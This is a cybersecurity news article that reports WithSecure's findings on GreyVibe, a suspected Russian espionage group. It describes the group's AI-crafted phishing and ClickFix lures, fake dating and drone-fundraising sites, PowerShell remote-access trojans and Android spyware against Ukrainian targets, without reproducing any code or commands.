A suspected Russian threat actor known as GreyVibe has been deploying AI-crafted lures alongside a broad arsenal of bespoke malware to target military, government, civilian, and business organizations.
This cyberespionage operation has been active since at least August 2025 and appears to serve Russian state objectives, though analysts stop short of formally categorizing it as a nation-state campaign.
WithSecure cybersecurity researchers first detected the activity in January and identified Ukrainian and Ukraine-linked organizations as the primary targets.
Evidence pointing to a Russian-speaking origin includes the language used in malware administration panels, comments found in code files, and the command-and-control (C2) servers being configured to UTC+3, which corresponds to Moscow time.
The researchers documented several attack methods used by GreyVibe:
- PhantomMail: Targeted spear-phishing emails containing harmful ZIP or RAR archives, delivered through Google Drive and 4sync URLs, with deceptive PDF attachments or staged error messages masking the malware-drop process. The lure content was made to resemble communications from Ukrainian government offices, emergency services, telecommunications providers, and energy sector entities.
- PhantomClick: Counterfeit CAPTCHA or ClickFix webpages mimicking Zoom and LAPAS portals, deceiving victims into pasting and executing self-infection commands under the guise of a fake Cloudflare security check.
- PrincessClub: Fraudulent Ukrainian adult or dating sites used to push the FallSpy Android surveillance tool and the PhantomRelay/LegionRelay Windows-based malware. The operators posed as women on Telegram to lure victims, later even incorporating WebRTC-powered live video or audio calls capable of recording the target.
- DroneLink: Bogus Ukrainian military fundraising websites themed around FPV drones and UAVs, sharing backend infrastructure and tooling with the PrincessClub operation.
- Nebo: Fake login pages imitating “СПО НЕБО,” a Russian military communications platform, apparently crafted to deceive Ukrainian military personnel into believing they were logging into a Russian military terminal.
The sophistication and realism of these decoy materials stand out, and WithSecure attributes this to the heavy use of AI platforms such as ChatGPT, Ideogram AI, and Google Gemini in crafting highly convincing, detailed content for the campaigns.
Source: WithSecure
AI involvement extends beyond content generation into tool development. Researchers identified custom obfuscators named LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, which they believe were largely produced with the aid of large language models.
A PowerShell-based remote access trojan called LegionRelay was also almost certainly built with AI assistance, according to the analysis.
LegionRelay is capable of stealing files, taking screenshots, harvesting browser credentials, exfiltrating data from Telegram and WhatsApp, and configuring remote desktop access.
Another piece of malware in GreyVibe’s toolkit is PhantomRelay, also a PowerShell RAT. It features system fingerprint loading, on-the-fly dynamic script loading, and the ability to run both PowerShell and native Windows commands.
.jpg)
Source: WithSecure
In addition, the group deployed the FallSpy Android spyware through both the PrincessClub and Nebo campaigns, a tool designed exclusively for intelligence collection.
The spyware harvests contact lists, call history, device and network details, location data, media files, and SIM card information.
While the GreyVibe operation shares characteristics with nation-state activity, WithSecure notes it “did not meet the level of sophistication and operational security typically associated with established nation-state actors.”
Moreover, the PhantomRelay malware has been independently observed in financially motivated cybercrime operations, though researchers were able to distinguish those uses from the state-aligned ones. This has led to speculation that GreyVibe “may include current or former cybercrime operatives within its ranks.”
Supporting this theory, early-stage and test builds of the malware used a unique ISO creation tool previously linked to a faction of former TrickBot operatives, the group tracked as UAC-0098, which targeted Ukraine at the onset of the Russian invasion.
Additional red flags include the group uploading development and test builds to publicly accessible scanning services, a habit inconsistent with disciplined nation-state tradecraft. In some cases, a cryptocurrency miner was also observed running on compromised machines.
The exact nature of the group’s composition remains unclear, with researchers considering three possibilities: former cybercriminals absorbed into a state-backed unit, independent cybercriminal actors operating under state tasking, or a hybrid arrangement mixing state-affiliated and criminal personnel.
Defenders can build detection and mitigation strategies against GreyVibe’s tactics by leveraging the indicators of compromise (IoCs) published by WithSecure.
Automated penetration testing tools provide genuine value, but they were designed to answer one specific question: can an attacker traverse the network? They were not engineered to verify whether your security controls block threats, your detection rules trigger correctly, or your cloud configurations stand up to scrutiny.
This guide outlines the six critical attack surfaces you should actually be validating.
Download Now
